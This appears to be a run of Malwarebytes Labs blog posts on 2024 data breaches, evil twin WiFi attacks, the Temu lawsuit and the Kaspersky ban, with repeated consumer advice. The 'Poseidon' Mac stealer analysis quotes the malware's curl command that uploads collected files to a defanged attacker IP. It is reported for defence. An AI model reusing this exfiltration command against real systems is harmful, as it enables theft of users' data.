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Prudential Financial data breach impacts 2.5 million people, not 36,000 as first thought

In February 2024, Prudential Financial reported it had fallen victim to a ransomware attack. The attack was discovered one day after it started, but not before some 2.5 million people had been impacted by the resulting data breach.

As one of the largest insurance companies in the US, Prudential employs 40,000 people worldwide and reported revenues of over $50 billion in 2023.

At first, Prudential said it believed only 36,000 people had had their data stolen, but that number has now been revised to 2.5 million in a new breach notification. The company has also adjusted what information has stolen. In the original notification the company stated:

“On the basis of the investigation to date, we do not have any evidence that the threat actor has taken customer or client data.”

However, Prudential is now saying the stolen data also impacted many customers and included:

  • Full names
  • Driving license numbers
  • Non-driving license identification cards

The data breach notification states that the company will be giving affected customers 24 months of identity theft and credit monitoring services through Kroll.

Below are some general tips on what to do after you’ve fallen victim to a data breach.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your digital footprint

Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Personal data stolen from unsuspecting airport visitors and plane passengers in “evil twin” attacks, man charged

The Australian Federal Police (AFP) have charged a man for setting up fake free WiFi access points in order to steal personal data from people.

The crime was discovered when an airline reported a suspicious WiFi network identified by its employees during a domestic flight. When the alleged perpetrator landed at Perth airport, his bags were searched and authorities found a portable wireless access device, a laptop, and a mobile phone in his hand luggage.

The police say that the man, 42, used a portable wireless access device to create ‘evil twin’ free WiFi networks; so called because criminals set up free WiFi access points that mimic the name of legitimate public WiFi networks.

When people tried to connect their devices to the free WiFi networks, they were taken to a fake webpage requiring them to sign in using their email or social media logins. Those details were then allegedly saved to the man’s devices.

The email and password details harvested could then be used to access more personal information, including bank accounts, emails and messages, photos and videos, and more. 

AFP cybercrime investigators have identified data relating to the use of the alleged fraudulent WiFi pages at airports in Perth, Melbourne and Adelaide, on domestic flights, and at locations linked to the man’s previous employment.

The investigation is ongoing but the man can expect to face nine charges for the alleged cybercrime offences.

‘Evil twin’ attacks are a type of “machine-in-the-middle” attack, where all traffic is routed through a server under the attacker’s control, giving them access to all of the submitted information.

Cybercriminals favour places where people expect to have free WiFi, such as airports, planes, coffee, shops, and libraries. The attacker finds the legitimate network name—known as the SSID (service set identifier)—and creates an access point with the same name.

Access points and wireless router networks broadcast their SSIDs to identify themselves, but the identifiers are not unique. Your device can connect to any SSID if the network has no security options enabled, and it will not be able to differentiate between the legitimate and the fake one.

Evil twin attacks are based on the fact that when two networks have the same SSID and security settings, your device will either connect to the one with the strongest signal or the one it sees first.

How to stay safe from evil twin attacks

There are a few things you can do to protect yourself against this kind of attack.

  • Firstly, do not allow your device to auto-connect to public or unsecure networks. See below on how to turn this off.
  • Look out for unexpected behavior. To connect to a free WiFi network, you shouldn’t have to enter any personal details—such as logging in through an email or social media account.
  • Install a trusted VPN to encrypt the traffic regardless of the network you are using, and even when you’re not visiting websites that HTTPS (Hypertext transfer protocol secure) which encrypts the traffic between a browser and the website.
  • And my personal favorite: Use your own personal hotspot. I use a portable 5G Mifi router, which provides me with reliable high-speed WiFi throughout my domestic journeys.

How to disable auto-connect

When you’re travelling it may be safer to disable auto-connect on Wi-Fi altogether.

On Android it works roughly like this (steps may be slightly different depending on your Android version, device type, and vendor):

Settings > Network & Internet (or Connections) > Wi-Fi > Wi-Fi preferences (or Advanced). Toggle off Connect to public networks.

On iOS you can disable auto-connect by doing this:

Settings > Wi-Fi. Tap the (i) next to the network name and then toggle off Auto-Join.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Busted for book club? Why cops want to see what you’re reading, with Sarah Lamdan (Lock and Code S05E14)

This week on the Lock and Code podcast

More than 20 years ago, a law that the United States would eventually use to justify the warrantless collection of Americans’ phone call records actually started out as a warning sign against an entirely different target: Libraries.

Not two months after terrorists attacked the United States on September 11, 2001, Congress responded with the passage of The USA Patriot Act. Originally championed as a tool to fight terrorism, The Patriot Act, as introduced, allowed the FBI to request “any tangible things” from businesses, organizations, and people during investigations into alleged terrorist activity. Those “tangible things,” the law said, included “books, records, papers, documents, and other items.”

Or, to put it a different way: things you’d find in a library and records of the things you’d check out from a library. The concern around this language was so strong that this section of the USA Patriot Act got a new moniker amongst the public: “The library provision.”

The Patriot Act passed, and years later, the public was told that, all along, the US government wasn’t interested in library records.

But those government assurances are old.

What remains true is that libraries and librarians want to maintain the privacy of your records. And what also remains true is that the government looks anywhere it can for information to aid investigations into national security, terrorism, human trafficking, illegal immigration, and more.

What’s changed, however, is that companies that libraries have relied on for published materials and collections—Thomson Reuters, Reed Elsevier, Lexis Nexis—have reimagined themselves as big data companies. And they’ve lined up to provide newly collected data to the government, particularly to agencies like Immigrations and Customers Enforcement, or ICE.

There are many layers to this data web, and libraries are seemingly stuck in the middle.

Today, on the Lock and Code podcast with host Davd Ruiz, we speak with Sarah Lamdan, deputy director Office of Intellectual Freedom at the American Library Association, about library privacy in the digital age, whether police are legitimately interested in what the public is reading, and how a small number of major publishing companies suddenly started aiding the work of government surveillance:

“Because to me, these companies were information providers. These companies were library vendors. They’re companies that we work with because they published science journals and they published court reporters. I did not know them as surveillance companies.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (
Licensed under Creative Commons: By Attribution 4.0 License
Outro Music: “Good God” by Wowa (

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

TEMU sued for being “dangerous malware” by Arkansas Attorney General

Chinese online shopping giant Temu is facing a lawsuit filed by State of Arkansas Attorney General Tim Griffin, alleging that the retailer’s mobile app spies on users.

“Temu purports to be an online shopping platform, but it is dangerous malware, surreptitiously granting itself access to virtually all data on a user’s cellphone.”

Temu quickly denied the allegations.

In speaking with the outlet Ars Technica, a Temu spokesperson said “the allegations in the lawsuit are based on misinformation circulated online, primarily from a short-seller, and are totally unfounded.”

According to Baclinko statistics, Temu was the most downloaded shopping app worldwide in 2023, with 337.2 million downloads, 1.8x more than Amazon Shopping, and according to TechCrunch, Temu was the most downloaded free iPhone app in the US for 2023.

Temu is most popular today likely for its exceedingly low prices (a brief scan of its website shows a shoulder-sling backpack being sold for $2.97, and a broom-and-dust–pan combo for $12.47). How those low prices are achieved has been a mystery for some onlookers, but current theories include:

  • Temu relies on the de minimis exception to ship goods directly to U.S. customers for a low price. A shipment below the de minimis value of $800 isn’t inspected or taxed by US Customs.
  • The online webshop pressures manufacturers to lower their prices even further to appease discount-seeking customers, leaving those manufacturers with little to no profit in return.
  • Most items sold on Temu are unbranded and manufactured en masse by manufacturers in China. Almost every tech product on Temu is a knockoff or “dupe” of a real, brand-name product.

But according to reporting last year from Wired, Temu’s low prices are easy to decipher—Temu itself is losing millions of dollars to break into the US market.

“An analysis of the company’s supply chain costs by WIRED—confirmed by a company insider—shows that Temu is losing an average of $30 per order as it throws money at trying to break into the American market.”

Attorney General Griffin seems determined that Temu baits users with misleading promises of discounted, quality goods and adds addictive features like wheels of fortune to keep users engaged to the app.

He called Temu “functionally malware and spyware,” adding that the app was “purposefully designed to gain unrestricted access to a user’s phone operating system.”

The lawsuit claims that Temu’s app can sneakily access “a user’s camera, specific location, contacts, text messages, documents, and other applications.” Further, the lawsuit alleges that Temu is capable of recompiling itself, changing properties, and overriding the data privacy settings set by the user. If true, this would make it almost impossible to detect, even by “sophisticated” users, the lawsuit said.

Some may suspect that this is another attempt to ban an app hailing from a “foreign adversarial country” like TikTok, but Attorney General Griffin is very clear about his reasons.

“Temu is not an online marketplace like Amazon or Walmart. It is a data-theft business that sells goods online as a means to an end.”

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Driving licences and other official documents leaked by authentication service used by Uber, TikTok, X, and more

A company that helps to authenticate users for big brands had a set of administration credentials exposed online for over a year, potentially allowing access to user identity documents such as driving licenses.

As more and more legislation emerges requiring websites and platforms—like gambling services, social networks, and porn sites—to verify their users’ age, the requirement for authentication companies offering that service rises.

You may never have heard of the Israeli based authentication company, AU10TIX, but you will certainly recognize some of its major customers, like Uber, TikTok, X, Fiverr, Coinbase, LinkedIn, and Saxo Bank.

Au10tix advertising the authentication and age verification for the world's leading brands

AU10TIX checks users’ identities via the upload of a photo of an official document.

A researcher found that AU10TIX had left the credentials exposed, providing 404 Media with screenshots and data to demonstrate their findings. The credentials led to a logging platform containing data about people that had uploaded documents to prove their identity.

Whoever accessed the platform could peruse information about those people, including name, date of birth, nationality, identification number, and the type of uploaded document such as a drivers’ license, linking to an image of the identity document itself.

Research showed that the likely source of the credentials was an infostealer on a computer of a Network Operations Center Manager at AU10TIX.

Stolen credentials have shown to be a major source of breaches like those recently associated with Snowflake. Snowflake pointed to research which found that one cybercriminal obtained access to multiple organizations’ Snowflake customer instances using stolen customer credentials.

Another major problem is that these sets of credentials get traded and sold all the time. And it’s not as if when you sold them once, that’s it. Digital information can be copied and combined endlessly, leading to huge data sets that criminals can use as they see fit.

We’ve talked about the dangers of data brokers in the past. The California Privacy Protection Agency (CPPA) defines data brokers as businesses that consumers don’t directly interact with, but that buy and sell information about consumers from and to other businesses. There are around 480 data brokers registered with the CPPA. However, that might be just the tip of the iceberg, because there are a host of smaller players active that try to keep a low profile.

Either way, for any company and particularly an authentication company working with sensitive data, having such an account accessible with just login credentials should be grounds for serious penalties.

In a statement given to 404 Media, AU10TIX said it was no longer using the system and had no evidence the data had been used:

“While PII data was potentially accessible, based on our current findings, we see no evidence that such data has been exploited. Our customers’ security is of the utmost importance, and they have been notified.”

For now, there’s not much that individual users of the brands can do apart from keep an eye out for any official statements, and consider an ongoing identity monitoring solution. Below are some general tips on what to do if your data has been part of a data breach:

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your personal data exposure

You can check what personal information of yours has been exposed on our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

‘Poseidon’ Mac stealer distributed via Google ads

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

Rodrigo4 launches new PR campaign

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

Distribution via Google ads

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to arc-download[.]com, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

Connection to new Poseidon project

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @/tmp/ http:// 79.137.192[.]4/p2p\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page


There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac will keep detecting this ‘Poseidon campaign as OSX.RodStealer and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

Indicators of Compromise

Google ad domain


Decoy site


Download URL


Payload SHA256




[updated] Federal Reserve “breached” data may actually belong to Evolve Bank

A shockwave went through the financial world when ransomware group LockBit claimed to have breached the US Federal Reserve, the central banking system of the United States.

On LockBit’s dark web leak site, the group threatened to release over 30 TB of banking information containing Americans’ banking data if a ransom wasn’t paid by June 25:

LockBit post about Federal Reserve
LockBit leak site

“Federal banking is the term for the way the Federal Bank of America distributes its money. The Reserve operates twelve banking districts around the country which oversee money distribution within their respective districts. The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City and San Francisco.

33 terabytes of juicy banking information containing American’s banking secrets.”

The statement ends expressing the group’s disappointment about a negotiator who apparently offered to pay $50,000.

So, you can imagine that everyone was anticipating the end of the countdown that signalled the release of the stolen data with bated breath.

However, when that deadline passed and the data was released, people who looked at the data found it did not, in fact, belong to the Federal Reserve but instead to a particular financial organization: Evolve Bank & Trust.

The downloadable Evolve data
Overview of the available data

All the links lead to directories containing data that seems to belong to Evolve.

There hasn’t been enough time to do a full analysis of the huge amount of data, but it appears it is only remotely tied to the Federal Reserve by some included links to a Federal Reserve press link from mid-June.

At that time, the US Federal Reserve Board penalized Evolve Bancorp and its subsidiary, Evolve Bank & Trust, for multiple “deficiencies” in the bank’s risk management, anti-money laundering (AML) and compliance practices.

According to the Federal Reserve statement released at the time:

“In addition, Evolve did not maintain an effective risk management program or controls sufficient to comply with anti-money laundering laws and laws protecting consumers.”

So, as expected, LockBit drew a lot of attention under false pretences.

The group was disrupted by law enforcement in February of 2024 and their activity diminished as a result. As the ThreatDown monthly ransomware review of May review pointed out:

“While LockBit is technically still alive, it’s fair to say the group is not what it was: Not only are its attacks dwindling, but in early May law enforcement also revealed the identity of alleged LockBit leader Dmitry Khoroshev, aka LockBitSupp. LockBitSupp, who is now subjected to a series of asset freezes and travel bans, also has a reward of up to $10 million over his head for information that leads to his arrest.”

And recently the FBI announced it had over 7,000 LockBit decryption keys in its possession, allowing it to help victims to recover data encrypted by the gang in past attacks. LockBit ransomware has impacted over 1,800 US victims, according to FBI stats.

Back to the data, it’s good news it appears not to be from the Federal Reserve. However, it’s not good news for customers of Evolve Bank & Trust and their data may well have been stolen and published. And it’s a lot of data.

links to released data repositories
A lot of data

Update June 28, 2024

Mercury has notified customers that the data stolen from Evolve Bank & Trust, included some account numbers, deposit balances, business owner names, and emails associated with Mercury and other fintech accounts.

“Affected Mercury customers have been notified of the breach and the preventative steps we are taking to keep customer funds secure.”

It is as of yet unknown which “other fintech accounts” may be involved. We’ll keep you updated on this developing story. For now, there’s no official statement from Evolve, but there are general things to know if you think you have been involved in a data breach.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your digital footprint

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Malwarebytes Premium Security stops 100% of malware during AV Lab test

Malwarebytes Premium Security has maintained its long-running, perfect record in protecting users against online threats by blocking 100% of the malware samples deployed in the AV Lab Cybersecurity Foundation’s “Advanced In-The-Wild Malware Test.”

For its performance in the May 2024 evaluation, Malwarebytes Premium Security also received a certificate of “Excellence.”

According to AV Lab, such certificates “are granted to solutions that are characterized by a high level of security, with a rating of at least 99% of blocked threats in the Advanced In-The-Wild Malware Test.”

Every two months, the cybersecurity and information security experts at AV Lab construct a series of tests to compare cybersecurity vendors against the latest malware that is currently being used by adversaries and threat actors.

For the May evaluation, AV Lab tested 521 unique malware samples against 13 cybersecurity products. Malwarebytes Premium Security detected 521/521 malware samples, with a remediation time of 44 seconds—well below the 52-second average determined by AV Lab in its most recent testing.

Three cybersecurity vendors failed to block 100% of malware tested: ESET, F-Secure, and Panda.

To ensure that AV Lab’s evaluations reflect current cyberthreats, each round of testing follows three steps:

  1. Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.
  1. Simulating a real-world scenario in testing: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.
  1. Incident recovery time assessment: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”

Malwarebytes is proud to once again achieve a 100% score with AVLab’s Advanced In-The-Wild Malware Test, a trusted resource that proves our commitment to user safety.

Neiman Marcus confirms breach. Is the customer data already for sale?

Luxury retail chain Neiman Marcus has begun to inform customers about a cyberattack it discovered in May. The attacker compromised a database platform storing customers’ personal information.

The letter tells customers:

“Promptly after learning of the issue, we took steps to contain it, including by disabling access to the relevant database platform.”

In the data breach notification, Neiman Marcus says 64,472 people are affected.

An investigation showed that the data contained information such as name, contact data, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers. According to Neiman Marcus, the exposed data does not include gift card PINs. Shortly after the data breach disclosure, a cybercriminal going by the name “Sp1d3r” posted on BreachForums that they were willing to sell the data.

Post by Sp1d3r offering Neiman Marcus data for sale which has since been removed
Image courtesy of Daily Dark Web

“Neiman Marcus not interested in paying to secure data. We give them opportunity to pay and they decline. Now we sell. Enjoy!”

According to Sp1d3r, the data includes name, address, phone, dates of birth, email, last four digits of Social Security Numbers, and much more in 6 billion rows of customer shopping records, employee data, and store information.

Neiman Marcus is reportedly one of the many victims of the Snowflake incident, in which the third-party platform used by many big brands was targeted by cybercriminals. The name Sp1d3r has been associated with the selling of information belonging to other Snowflake customers.

Oddly enough, Sp1d3r’s post seems to have since disappeared.

current screenshot of Sp1d3r's profile showing 1 less post and thread
Later screenshot

Sp1d3r’s post count went down back to 19 instead of the 20 displayed in the screenshot above.

So, the post has either been removed, withdrawn, or hidden for reasons which are currently unknown. As usual, we will keep an eye on how this develops.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your exposure

While matters are still unclear on how much information was involved in the Neiman Marcus breach, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Change Healthcare confirms the customer data stolen in ransomware attack

For the first time since news broke about a ransomware attack on Change Healthcare, the company has released details about the data stolen during the attack.

First, a quick refresher: On February 21, 2024, Change Healthcare experienced serious system outages due to a cyberattack. The incident led to widespread billing outages, as well as disruptions at pharmacies across the United States. Patients were left facing enormous pharmacy bills, small medical providers teetered on the edge of insolvency, and the government scrambled to keep the money flowing and the lights on. The ransomware group ALPHV claimed responsibility for the attack.

But shortly after, the ALPHV group disappeared in an unconvincing exit scam designed to make it look as if the FBI had seized control over the group’s website. Then a new ransomware group, RansomHub, listed the organization as a victim on its dark web leak site, saying it possessed 4 TB of “highly selective data,” relating to “all Change Health clients that have sensitive data being processed by the company.”

In April, parent company UnitedHealth Group released an update, saying:

“Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America.”

Now, Change Healthcare has detailed the types of medical and patient data that was stolen. Although Change cannot provide exact details for every individual, the exposed information may include:

  • Contact information: Names, addresses, dates of birth, phone numbers, and email addresses.
  • Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers.
  • Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment.
  • Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due.
  • Other personal information: Social Security numbers, driver’s license or state ID numbers, and passport numbers.

Change Healthcare added:

“The information that may have been involved will not be the same for every impacted individual. To date, we have not yet seen full medical histories appear in the data review.”

Change Healthcare says it will send written letters—as long as it has a person’s address and they haven’t opted out of notifications—once it has concluded the data review.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your digital footprint

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

A week in security (June 17 – June 23)

First million breached Ticketmaster records released for free

The cybercriminal acting under the name “Sp1d3r” gave away the first 1 million records that are part of the data set that they claimed to have stolen from Ticketmaster/Live Nation. The files were released without a price, for free.

When Malwarebytes Labs first learned about this data breach, it happened to be the first major event that was shared on the resurrected BreachForums, and someone acting under the handle “ShinyHunters” offered the full details (name, address, email, phone) of 560 million customers for sale.

The same data set was offered for sale in an almost identical post on another forum by someone using the handle “SpidermanData.” This could be the same person or a member of the ShinyHunters group.

Following this event, Malwarebytes Labs advised readers on how to respond and stay safe. Importantly, even when a breach isn’t a “breach”—in that immediate moment when the details have yet to be confirmed and a breach subject is readying its public statements—the very news of the suspected breach can be used by advantageous cybercriminals as a phishing lure.

Later, Ticketmaster confirmed the data breach.

Bleeping Computer spoke to ShinyHunters who said they already had interested buyers. Now, Sp1d3r, who was seen posting earlier about Advance Auto Parts customer data and Truist Bank data, has released 1 million Ticketmaster related data records for free.

post giving away 1 million Ticketmaster data records
Post by Sp1d3r

In a post on BreachForums, Sp1d3r said:

“Ticketmaster will not respond to request to buy data from us.

They care not for the privacy of 680 million customers, so give you the first 1 million users free.”

The cybercriminals that are active on those forums will jump at the occasion and undoubtedly try to monetize those records. This likely means that innocent users that are included in the first million released records could receive a heavy volume of spam and phishing emails in the coming days.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your exposure

While matters are still unclear how much information was involved, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

US bans Kaspersky, warns: “Immediately stop using that software”

The US government will ban the sale of Kaspersky antivirus products to new customers in the United States starting July 20, with a follow-on deadline to prohibit the cybersecurity company from providing users with software updates after September 29.

The move follows years of allegations that the cybersecurity firm served as a hacking conduit for Russian intelligence agencies—allegations that the company has consistently denied.  

While current US Kaspersky customers will see no immediate impact from the ban, the September 29 software update deadline signals a bigger change. Without available updates, any cybersecurity product becomes less secure over time, and means the company won’t be able to protect customers against the newest threats.

In a briefing call with reporters on Thursday, US Department of Commerce Secretary Gina Raimondo offered consolation and advice to current customers of the antivirus products:

“You have done nothing wrong, and you are not subject to any criminal or civil penalties. However, I would encourage you, in as strong as possible terms, to immediately stop using that software and switch to an alternative in order to protect yourself and your data and your family.”

Kaspersky rebuffed the Biden Administration’s decision in a statement shared on social media Thursday.

“Kaspersky does not engage in activities which threaten US national security and, in fact, has made significant contributions with its reporting and protection from a variety of threat actors that targeted US interested and allies,” the company said. “The company intends to purse all legally available options to preserve its current operations and relationships.”

